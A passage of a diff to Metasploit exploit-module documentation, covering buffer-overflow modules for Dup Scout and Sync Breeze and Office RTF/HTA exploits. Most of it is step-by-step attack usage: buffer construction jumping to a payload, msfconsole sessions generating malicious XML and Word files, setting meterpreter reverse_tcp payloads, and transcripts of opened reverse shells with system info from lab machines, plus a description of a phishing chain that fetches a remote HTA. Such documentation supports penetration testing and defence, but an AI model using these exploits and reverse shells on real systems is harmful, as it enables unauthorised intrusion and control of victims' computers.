+buf << inst1             # LEA EAX, [ESP+14h] # Prepare EAX to jump to payload
+buf << inst2             # JMP EAX # Jump to our desired location
+buf << make_nops(14)     # Fill past possibly corrupted location
+buf << payload           # Location that is jumped to
+```
+
+Note: The last make_nops will offset the location of the payload. The offset is included to account for writes to the stack buffer that after the user-supplied Command file has been processed.
+
+## Verification Steps
+
+- [ ] Install Dup Scout Enterprise on target system
+- [ ] `./msfconsole`
+- [ ] `use exploit/windows/fileformat/dupscout_xml`
+- [ ] `set payload windows/meterpreter/reverse_tcp`
+- [ ] `set lhost <lhost>`
+- [ ] `run`
+- [ ] `use exploit/multi/handler`
+- [ ] `set payload windows/meterpreter/reverse_tcp`
+- [ ] `set lhost <lhost>`
+- [ ] `run`
+- [ ] From the DupScout Enterprise menu select Command -> Import Command
+- [ ] Select file generated by metasploit
+- [ ] Get a session
+
+
+## Scenarios
+
+### Dup Scout Enterprise v10.4.16 Windows 7 SP1 x64.
+
+```
+msf5 > use exploit/windows/fileformat/dupscout_xml
+msf5 exploit(windows/fileformat/dupscout_xml) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/fileformat/dupscout_xml) > set lhost 172.22.222.120
+lhost => 172.22.222.120
+msf5 exploit(windows/fileformat/dupscout_xml) > run
+
+[*] Creating 'msf.xml' file ...
+[+] msf.xml stored at /home/msfdev/.msf4/local/msf.xml
+msf5 exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler
+msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > set lhost 172.22.222.120
+lhost => 172.22.222.120
+msf5 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 172.22.222.120:4444 
+[*] Sending stage (179779 bytes) to 172.22.222.122
+
+meterpreter > getuid
+Server username: .\pwnduser
+meterpreter > sysinfo
+Computer        : .
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```

documentation/modules/exploit/windows/fileformat/office_dde_delivery.md

@@ -1,4 +1,3 @@
-
 Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.
 
 ## Vulnerable Application

documentation/modules/exploit/windows/fileformat/office_ms17_11882.md

@@ -1,7 +1,8 @@
+## Introduction
 
 Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.
 
-## Vulnerable Application
+## Vulnerable Applications
 
 - Microsoft Office 2016
 - Microsoft Office 2013 Service Pack 1
@@ -15,6 +16,7 @@ Module exploits a flaw in how the Equation Editor that allows an attacker to exe
 3. Do: `set PAYLOAD [PAYLOAD]`
 4. Do: `run`
 
+
 ## Options
 ### FILENAME
 Filename to output & if injecting a file, the file to inject

documentation/modules/exploit/windows/fileformat/office_word_hta.md

@@ -1,11 +1,13 @@
-Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage. 
+## Introduction
+
+Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Visual Basic for Application scripting language.
 
 FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
 
 The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
 
 
-## Vulnerable Application
+## Vulnerable Applications
 
 
 - Windows Vista Service Pack 2
@@ -41,8 +43,7 @@ The attack involves a threat actor emailing a Microsoft Word document to a targe
 ## Demo
 
 ```
-$ msfconsole
-msf > use exploit/windows/fileformat/office_word_hta 
+msf > use exploit/windows/fileformat/office_word_hta
 msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 msf exploit(office_word_hta) > set lhost 192.168.146.1
@@ -52,7 +53,7 @@ srvhost => 192.168.146.1
 msf exploit(office_word_hta) > run
 [*] Exploit running as background job.
 
-[*] Started reverse TCP handler on 192.168.146.1:4444 
+[*] Started reverse TCP handler on 192.168.146.1:4444
 [+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
 [*] Using URL: http://192.168.146.1:8080/default.hta
 [*] Server started.
@@ -65,4 +66,3 @@ and open it with Microsoft Office Word. You should receive a session:
 [*] Sending stage (957487 bytes) to 192.168.146.145
 [*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
 ```
-

documentation/modules/exploit/windows/fileformat/syncbreeze_xml.md

@@ -0,0 +1,45 @@
+This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file.
+
+## Vulnerable Application
+
+This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/e5c42cce3304c323776e4785e8fb4685-syncbreezeent_setup_v9.5.16.exe).
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `exploit/windows/fileformat/syncbreeze_xml`
+3. Do: `set PAYLOAD [PAYLOAD]`
+4. Do: `run`
+
+## Example
+```
+msf > use exploit/windows/fileformat/syncbreeze_xml
+msf exploit(windows/fileformat/syncbreeze_xml) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/fileformat/syncbreeze_xml) > set LHOST 192.168.216.5 
+LHOST => 192.168.216.5
+msf exploit(windows/fileformat/syncbreeze_xml) > run
+
+[*] Creating 'msf.xml' file ...
+[+] msf.xml stored at /root/.msf4/local/msf.xml
+msf exploit(windows/fileformat/syncbreeze_xml) > use exploit/multi/handler 
+msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(multi/handler) > set LHOST 192.168.216.5 
+LHOST => 192.168.216.5
+msf exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.216.5:4444 
+[*] Sending stage (179779 bytes) to 192.168.216.137
+[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.137:49830) at 2018-01-15 15:32:02 -0500
+
+meterpreter > sysinfo 
+Computer        : IE11WIN7
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > 
+```

documentation/modules/exploit/windows/http/vxsrchs_bof.md

@@ -20,7 +20,7 @@
 
 ## Scenarios
 
-###VX Search Enterprise v9.5.12 on Windows 7 SP1
+### VX Search Enterprise v9.5.12 on Windows 7 SP1
 
 ```
 msf exploit(vxsrchs_bof) > show options 

documentation/modules/exploit/windows/local/bypassuac_fodhelper.md

@@ -21,7 +21,7 @@
   and manually create a job handler corresponding to the payload.
   
 
-##Scenario
+## Scenario
 
 ```
 msf >